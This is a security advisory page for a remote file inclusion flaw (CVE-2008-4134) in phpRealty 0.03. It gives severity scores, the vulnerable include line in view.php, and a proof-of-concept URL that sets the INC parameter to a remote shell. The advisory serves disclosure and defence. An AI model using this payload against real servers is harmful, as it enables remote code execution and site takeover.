Bug: phpRealty 0.3 (INC) Remote File Inclusion Vulnerability ( Ascii Version )

Search:
WLB2

phpRealty 0.3 (INC) Remote File Inclusion Vulnerability

Published
Credit
Risk
2008.09.22
ka0x
High
CWE
CVE
Local
Remote
CWE-94
CVE-2008-4134
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
phpRealty <= 0.03 (INC) Remote File Inclusion Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$ Script: phpRealty
$ Version: <= 0.03
$ File affected: manager/static/view.php
$ Download: http://sourceforge.net/project/showfiles.php?group_id=204745


Found by ka0x <ka0x01 [at] gmail [dot] com>
D.O.M Labs - Security Researchers
- www.domlabs.org


vuln code:

-------------

11: if(!isset($_GET['propID']) || !is_numeric($_GET['propID']) || empty($_GET['propID'])){
13: return;


17: include($INC."curr_conv.class.php"); // -------->>> Vuln Line!!
// the var $INC isn't declared

-------------


Proof of Concept:
http://[host]/[phprealty-path]/manager/static/view.php?propID=0&INC= [ S H E L L ] ?


__EOF__

References:

http://www.securityfocus.com/bid/31213
http://www.milw0rm.com/exploits/6473
http://php-realty.com/

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version